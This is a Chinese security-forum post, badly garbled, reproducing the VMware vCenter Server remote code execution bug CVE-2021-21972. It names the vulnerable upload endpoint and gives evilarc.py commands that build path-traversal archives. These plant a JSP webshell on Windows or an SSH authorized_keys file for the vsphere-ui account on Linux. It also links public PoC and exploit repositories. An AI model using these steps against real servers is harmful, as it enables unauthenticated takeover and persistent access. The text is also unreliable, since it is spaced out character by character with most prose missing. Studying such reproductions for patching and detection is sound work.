搜索

[27317] 2021-08-18_VMwarevCenterServer远程代码执行漏洞复现CVE-2021-21972

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-19
2021-08-18_VMwarevCenterServer远程代码执行漏洞复现CVE-2021-21972 V M w a r e   v C e n t e r   S e r v e r   C V E - 2 0 2 1 - 2 1 9 7 2     M s 0 8 0 6 7   2 0 2 1 - 0 8 - 1 8 # v m w a r e   , 1 #   , 3 # W e b   , 8 # W e b   , 7 #   , 2 3 M S 0 8 0 6 7 T a o i n g W E B 0 x 0 0   C V E - 2 0 2 1 - 2 1 9 7 2   v m w a r e   v c e n t e r w e b s h e l l 0 x 0 1   V M w a r e   v C e n t e r   S e r v e r   7 . 0   <   7 . 0 . U 1 c   V M w a r e   v C e n t e r   S e r v e r   6 . 7   <   6 . 7 . U 3 l   V M w a r e   v C e n t e r   S e r v e r   6 . 5   <   6 . 5   U 3 n   V M w a r e   E S X i   7 . 0   <   E S X i 7 0 U 1 c - 1 7 3 2 5 5 5 1   V M w a r e   E S X i   6 . 7   <   E S X i 6 7 0 - 2 0 2 1 0 2 4 0 1 - S G   V M w a r e   E S X i   6 . 5   <   E S X i 6 5 0 - 2 0 2 1 0 2 1 0 1 - S G   V M w a r e - V C S A - a l l - 6 . 7 . 0 - 8 2 1 7 8 6 6   V M w a r e - V I M - a l l - 6 . 7 . 0 - 8 2 1 7 8 6 6   2 0 2 1 - 0 2 - 2 4 0 x 0 2   h t t p s : / / b l o g . 5 1 c t o . c o m / 1 2 2 1 8 9 7 3 / 2 4 9 6 6 7 5 V M w a r e   v C e n t e r   6 . 7 1 . 访 h t t p s : / / Y o u r   I P / u i / v r o p s p l u g i n u i / r e s t / s e r v i c e s / u p d a t e o v a   h t t p s : / / i p / u i / v r o p s p l u g i n u i / r e s t / s e r v i c e s / g e t s t a t u s   4 0 4 4 0 1   4 0 5   2 0 0  
2 . 使 T a b b e d   P o s t m a n   -   R E S T   C l i e n t   P O S T s h e l l   使 p o s t m a n   2 0 0   S U C C E S S 使 使 3 . 0 s h e l l     s h e l l / u i / r e s o u r c e s / s h e l l . j s p 3 . 0 -  
0 x 0 3   1 . h t t p s : / / g i t h u b . c o m / p t o o m e y 3 / e v i l a r c / b l o b / m a s t e r / e v i l a r c . p y   e v i l a r c . p y z i p 使 e v i l a r c z i p p y t h o n   e v i l a r c . p y   - d   2   - p   ' t e s t F o l d e r ' - o   w i n   - f   w i n e x p l . t a r   t e s t U p l o a d . t x t w i n e x p l . t a r . . . . t e s t F o l d e r t e s t U p l o a d . t x t   P O C b u r p s u t i w i n e x p l . t a r . o v a   P O C b u r p s u t i w i n e x p l . t a r . o v a   C : t e s t F o l d e r t e s t U p l o a d . t x t
C : t e s t F o l d e r t e s t U p l o a d . t x t 2 W i n d o w s R C E 1 . 2 . 访 W e b . j s p   t e s t U p l o a d . t x t v s p h e r e - u i     w i n d o w s C : P r o g r a m D a t a V M w a r e v C e n t e r S e r v e r d a t a p e r f c h a r t s t c - i n s t a n c e w e b a p p s s t a t s r e p o r t J S P ( 访   t a r p y t h o n   e v i l a r c . p y   - d   5   - p   ' P r o g r a m D a t a V M w a r e v C e n t e r S e r v e r d a t a p e r f c h a r t s t c - i n s t a n c e w e b a p p s s t a t s r e p o r t '   - o   w i n   - f w i n e x p l . t a r   t e s t R C E . j s p
3 L i n u x R C E 使 v s p h e r e - u i 使 S S H .     s s h - k e y g e n   - t   r s a  
  使 . t a r   t a r : p y t h o n   e v i l a r c . p y   - d   5   - p   ' h o m e / v s p h e r e - u i / . s s h '   - o   u n i x   - f   l i n e x p l . t a r   a u t h o r i z e d _ k e y s   s s h   v s p h e r e - u i @ Y o u r   I P   P O C 使  
h t t p s : / / k b . v m w a r e . c o m / s / a r t i c l e / 8 2 3 7 4 R e f e r e n c e h t t p s : / / g i t h u b . c o m / h o r i z o n 3 a i / C V E - 2 0 2 1 - 2 1 9 7 2 h t t p s : / / s w a r m . p t s e c u r i t y . c o m / u n a u t h - r c e - v m w a r e /   h t t p s : / / m p . w e i x i n . q q . c o m / s / N W V e 4 j x p W M q Q N H I A m Y H I 6 g   P O C : h t t p s : / / g i t h u b . c o m / Q m F 0 c 3 U K / C V E - 2 0 2 1 - 2 1 9 7 2 - v C e n t e r - 6 . 5 - 7 . 0 - R C E - P O C   E x p p a y l o a d : h t t p s : / / g i t h u b . c o m / N S - S p 4 c e / C V E - 2 0 2 1 - 2 1 9 7 2 T a o i n g W E B   1     P H P S R C *
2 9 9 9 2 4 9 9 5 0 3 6 5 W e b 5 0 3 6 5 W e b W e b   1 9 0 0 - 2 1 : 0 0   2 4 4 8 6 线 线 + + W e b T a o i n g M S 0 8 0 6 7 W e b T t s s G k f M S 0 8 0 6 7 W e b D e f c o n   G r o u p   8 6 0 2 1 W e b M S 0 8 0 6 7 W e b         M S 0 8 0 6 7         M S 0 8 0 6 7 4 4 M S 0 8 0 6 7 1 0 0 % 1 - 2                    
    5 0 0 0 +
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理